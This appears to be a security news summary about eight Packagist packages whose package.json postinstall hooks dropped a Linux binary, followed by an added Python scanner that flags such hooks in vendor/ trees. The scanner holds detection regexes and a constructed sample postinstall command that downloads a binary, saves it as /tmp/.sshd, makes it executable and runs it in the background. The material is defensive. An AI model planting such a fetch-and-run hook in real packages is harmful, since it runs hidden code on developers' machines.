Packagist Supply Chain Attack Infects 8 Packages Using GitHub-Hosted Linux Malware
Briefly

Eight Packagist packages were hit by a coordinated supply chain attack. The malicious code was not placed in composer.json but in package.json, targeting projects that ship JavaScript build tooling alongside PHP code, so teams that only review Composer metadata can miss it. The postinstall script downloads a Linux binary from a GitHub Releases URL, saves it to /tmp/.sshd, makes it executable with chmod, and runs it in the background. The malicious versions have been removed from Packagist. The packages' upstream repositories were modified to include the script, and Socket found references to the same payload across 777 GitHub files, including at least two GitHub workflow entries; how many of these are distinct compromises rather than forks, duplicate artifacts, or cached references is not yet known.
"Although the affected packages were all Composer packages, the malicious code was not added to composer.json. Instead, it was inserted into package.json, targeting projects that ship JavaScript build tooling alongside PHP code. This cross-ecosystem placement makes the activity stand out because developers and security teams scanning PHP dependencies may only focus on Composer-related metadata, while skipping package.json lifecycle hooks that are bundled within the package. The malicious versions have since been removed from Packagist."
"An analysis of the packages has uncovered that their upstream repositories have been modified to include a postinstall script that attempts to download a Linux binary from a GitHub Releases URL ("github[.]com/parikhpreyash4/systemd-network-helper-aa5c751f"), save it to the "/tmp/.sshd" folder, change its permissions using "chmod" to grant execute permissions to all users, and run it in the background."
"Socket's investigation has found references to the same payload across 777 files in GitHub, suggesting that it could be part of a broader campaign. In at least two instances, it was added to a GitHub workflow. However, it's currently not known how many of these match distinct compromises, forks, duplicate package artifacts, or cached references."
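The practical lesson from the quotes above is that a Composer dependency audit has to look inside every package.json shipped in vendor/, not just composer.json, and specifically at the npm lifecycle hooks that run on `npm install`. The script below is an added example (not code from The Hacker News, Socket, or Packagist) that walks a vendor tree, parses each package.json, and flags lifecycle hooks showing the download, hidden /tmp file, chmod, background-execution pattern described in the article. The package names, URL, and manifests in it are constructed for illustration; the regex indicators are heuristics, so treat a hit as something to read by hand rather than as proof of compromise.

```python
"""Flag download-and-execute patterns in package.json lifecycle hooks that are
bundled inside Composer (vendor/) packages.

Added example; not the article's or any vendor's code. Sample manifests below
are constructed and do not reproduce the real malicious package.json.
"""
import json
import os
import re
from typing import Dict, List

# npm hooks that run automatically during `npm install` / `npm ci`.
LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall", "prepare", "prepublish")

# Individual indicators. None is malicious alone; the combination of a
# downloader, a hidden /tmp path, chmod and backgrounding is the pattern
# the article describes.
INDICATORS = [
    ("downloader", re.compile(r"\b(curl|wget)\b")),
    ("release-url", re.compile(r"github\.com/[^\s\"']+/releases/download/")),
    ("hidden-tmp-file", re.compile(r"/tmp/\.[^\s\"']+")),
    ("chmod-exec", re.compile(r"\bchmod\s+(?:[ugoa]*\+x|[0-7]{3,4})\b")),
    ("background-exec", re.compile(r"(&\s*$|\bnohup\b|\bsetsid\b|\bdisown\b)")),
    ("shell-eval", re.compile(r"\b(eval|base64\s+(-d|--decode))\b")),
]


def inspect_hooks(package_json_text: str) -> Dict[str, List[str]]:
    """Return {hook_name: [indicator labels]} for every lifecycle hook in a
    package.json that trips at least one indicator. Unparseable or
    script-less manifests yield an empty dict."""
    try:
        manifest = json.loads(package_json_text)
    except json.JSONDecodeError:
        return {}
    scripts = manifest.get("scripts") if isinstance(manifest, dict) else None
    if not isinstance(scripts, dict):
        return {}
    findings: Dict[str, List[str]] = {}
    for hook in LIFECYCLE_HOOKS:
        cmd = scripts.get(hook)
        if not isinstance(cmd, str):
            continue
        hits = [label for label, rx in INDICATORS if rx.search(cmd)]
        if hits:
            findings[hook] = hits
    return findings


def risk_level(hits: List[str]) -> str:
    """Collapse indicator hits into a triage label. A downloader combined with
    chmod or backgrounding is the stage-one dropper shape from the article."""
    if "downloader" in hits and ("chmod-exec" in hits or "background-exec" in hits):
        return "download-and-execute"
    if len(hits) >= 2:
        return "suspicious"
    return "review"


def scan_manifests(manifests: Dict[str, str]) -> Dict[str, Dict[str, str]]:
    """manifests maps a path (e.g. vendor/acme/widget/package.json) to its
    text; returns {path: {hook: risk_level}} for flagged manifests only."""
    report: Dict[str, Dict[str, str]] = {}
    for path, text in manifests.items():
        findings = inspect_hooks(text)
        if findings:
            report[path] = {hook: risk_level(hits) for hook, hits in findings.items()}
    return report


def scan_vendor_dir(root: str) -> Dict[str, Dict[str, str]]:
    """Walk a Composer vendor/ tree and scan every package.json, including
    ones nested inside JS build tooling shipped by a PHP package."""
    manifests: Dict[str, str] = {}
    for dirpath, _dirs, files in os.walk(root):
        if "package.json" in files:
            path = os.path.join(dirpath, "package.json")
            with open(path, encoding="utf-8", errors="replace") as fh:
                manifests[path] = fh.read()
    return scan_manifests(manifests)


# Constructed samples (hypothetical package and URL, not the real payload).
MALICIOUS_SAMPLE = json.dumps({
    "name": "example-php-widget-assets",
    "scripts": {
        "build": "vite build",
        "postinstall": "curl -fsSL https://github.com/example-org/example-repo"
                       "/releases/download/v1/helper -o /tmp/.sshd"
                       " && chmod 755 /tmp/.sshd && nohup /tmp/.sshd >/dev/null 2>&1 &",
    },
})
BENIGN_SAMPLE = json.dumps({
    "name": "example-php-widget-assets",
    "scripts": {"build": "vite build", "postinstall": "node scripts/copy-assets.js"},
})

if __name__ == "__main__":
    print(scan_manifests({"vendor/example/widget/package.json": MALICIOUS_SAMPLE,
                          "vendor/example/clean/package.json": BENIGN_SAMPLE}))
```

Run `scan_vendor_dir("vendor")` from a project root after `composer install`; anything reported as download-and-execute deserves a manual read of the hook and of the package's upstream repository history. As a containment measure while triaging, `npm install --ignore-scripts` prevents lifecycle hooks from running at all.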
Read at The Hacker News